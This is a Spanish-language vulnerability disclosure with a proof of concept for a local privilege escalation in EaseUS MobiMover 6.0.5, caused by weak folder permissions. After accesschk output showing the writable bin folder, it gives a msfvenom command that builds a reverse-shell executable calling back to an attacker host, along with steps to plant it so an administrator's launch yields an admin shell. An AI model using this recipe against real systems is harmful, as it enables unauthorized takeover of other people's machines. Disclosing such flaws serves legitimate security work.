
EaseUS MobiMover 6.0.5 Build 21620 - Permisos inseguros de archivos y carpetas
MobiMoverUILaunch.exe sufre de una vulnerabilidad de elevación de privilegios que puede ser aprovechada por un "Usuario autenticado" para modificar el archivo ejecutable del servicio con un binario de su elección dentro de la carpeta bin. La vulnerabilidad existe debido a un conjunto débil de permisos otorgados al "Grupo de Usuarios autenticados", que concede el indicador (M), también conocido como "Privilegio de modificación".

Página web del proveedor: https://www.easeus.com/
Enlace del software : https://down.easeus.com/product/mobimover_trial_setup
Google Drive: https://drive.google.com/file/d/1tqP00IV-WzqNpyE1Rnqwdg_44RxOhINQ/view?usp=sharing
Vídeo del PoC: https://www.youtube.com/watch?v=FR4cQm-z4Gw
#PoC
C:\Users\creatigon>accesschk -uwvqd "C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin"
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
FILE_ALL_ACCESS
RW NT SERVICE\TrustedInstaller
FILE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
Crea un archivo binario malicioso en kali linux con msfvenom
msfvenom -f exe -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f exe -o prepare.exe
Transfiere el archivo 'prepare.exe' creado al host Windows desde Kali con acceso de usuario de bajo nivel
Mueve el archivo binario 'prepare.exe' creado a 'C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin\prepare.exe' para reemplazar el anterior con acceso de usuario de bajo nivel
Cuando el administrador ejecute la aplicación, obtendrás una reverse shell como administrador